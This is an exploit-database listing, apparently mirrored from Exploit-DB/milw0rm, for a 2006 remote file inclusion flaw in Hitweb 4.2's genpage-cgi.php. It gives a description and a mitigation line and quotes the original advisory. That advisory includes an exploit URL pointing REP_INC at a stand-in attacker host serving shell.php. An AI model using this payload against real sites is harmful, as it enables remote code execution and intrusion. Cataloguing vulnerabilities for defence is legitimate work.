header-logo
Suggest Exploit
vendor:
Hitweb
by:
ToxiC
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Hitweb
Affected Version From: 4.2
Affected Version To: 4.2
Patch Exists: NO
Related CWE: N/A
CPE: a:hitweb:hitweb:4.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Hitweb 4.2 Remote Include File

The vulnerability exists in the genpage-cgi.php page of the Hitweb 4.2 application. The application fails to properly sanitize user-supplied input to the $REP_INC variable, allowing an attacker to include a remote file containing arbitrary code, which will be executed by the vulnerable application.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

Hitweb 4.2 Remote Include File

CreW: ToxiC

Bug Found By Drago84

Sorce Code:
http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz

Problem is:
include "$REP_INC/lib_database.php";

Page:
genpage-cgi.php

Path:
Declare $REP_INC

Expl:
http://www.site.com/dir_hitweb/genpage-cgi.php?REP_INC=http://www.evalsite.com/shell.php?

Greatz:Str0ke

# milw0rm.com [2006-08-08]

Navigation

Suggest Exploit

Services By CQR